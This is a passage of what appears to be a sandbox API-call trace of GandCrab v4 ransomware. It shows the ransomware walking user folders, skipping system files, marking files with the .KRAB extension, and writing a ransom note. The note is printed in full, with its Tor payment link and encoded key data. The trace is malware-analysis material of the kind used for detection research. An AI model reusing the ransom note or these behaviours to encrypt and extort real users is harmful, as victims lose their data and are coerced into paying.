[0059.687] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.687] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt" [0059.687] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.687] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt.KRAB") returned 102 [0059.687] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt") returned 97 [0059.687] lstrlenW (lpString=".txt") returned 4 [0059.687] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.688] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.688] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt") returned 97 [0059.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\KRAB-DECRYPT.txt") returned 97 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.688] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.689] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.689] FindNextFileW (in: hFindFile=0xfbd8a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0059.689] FindClose (in: hFindFile=0xfbd8a0 | out: hFindFile=0xfbd8a0) returned 1 [0059.689] CloseHandle (hObject=0x448) returned 1 [0059.689] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.689] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.689] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.689] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock" [0059.689] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.690] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 106 [0059.690] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\d2ca4a08d2ca4dee3d.lock") returned 101 [0059.690] lstrlenW (lpString=".lock") returned 5 [0059.690] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.690] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.690] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.690] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.691] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0059.691] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.691] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.691] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt" [0059.691] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.691] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt.KRAB") returned 99 [0059.691] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt") returned 94 [0059.691] lstrlenW (lpString=".txt") returned 4 [0059.691] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.691] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.692] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.692] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt") returned 94 [0059.692] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\KRAB-DECRYPT.txt") returned 94 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.692] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.693] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.693] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.693] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.694] FindNextFileW (in: hFindFile=0xfbd2e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0059.694] FindClose (in: hFindFile=0xfbd2e0 | out: hFindFile=0xfbd2e0) returned 1 [0059.694] CloseHandle (hObject=0x440) returned 1 [0059.695] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.695] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.695] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.695] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock" [0059.695] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.695] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 101 [0059.695] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\d2ca4a08d2ca4dee3d.lock") returned 96 [0059.695] lstrlenW (lpString=".lock") returned 5 [0059.695] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.695] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.695] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.696] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.696] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.696] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.696] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.696] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt" [0059.696] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.696] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt.KRAB") returned 94 [0059.697] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt") returned 89 [0059.697] lstrlenW (lpString=".txt") returned 4 [0059.697] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.697] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0059.697] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.697] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt") returned 89 [0059.697] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\KRAB-DECRYPT.txt") returned 89 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0059.697] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0059.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0059.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0059.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0059.698] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0059.698] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.698] FindNextFileW (in: hFindFile=0xfbd960, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0059.698] FindClose (in: hFindFile=0xfbd960 | out: hFindFile=0xfbd960) returned 1 [0059.698] CloseHandle (hObject=0x3ac) returned 1 [0059.698] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0059.698] lstrcmpW (lpString1="Excel", lpString2=".") returned 1 [0059.698] lstrcmpW (lpString1="Excel", lpString2="..") returned 1 [0059.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Excel" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel" [0059.699] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\" [0059.699] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0059.699] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0059.699] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0059.699] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0059.699] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0059.699] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.699] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.700] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\\\KRAB-DECRYPT.txt") returned 71 [0059.700] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0059.735] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0059.735] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0059.736] CloseHandle (hObject=0x3ac) returned 1 [0059.736] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.737] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.737] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x6, wMilliseconds=0x3a2)) [0059.737] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.737] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0059.738] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0059.738] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock") returned 77 [0059.738] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0059.739] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.739] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.739] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\") returned 54 [0059.739] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*" [0059.739] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd6e0 [0059.740] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.740] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.740] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.740] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.740] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.740] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0059.740] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0059.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock" [0059.740] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0059.740] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0059.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a08d2ca4dee3d.lock") returned 77 [0059.740] lstrlenW (lpString=".lock") returned 5 [0059.740] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0059.741] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0059.741] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.741] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.741] FindNextFileW (in: hFindFile=0xfbd6e0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0059.741] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0059.741] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0059.741] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\KRAB-DECRYPT.txt") 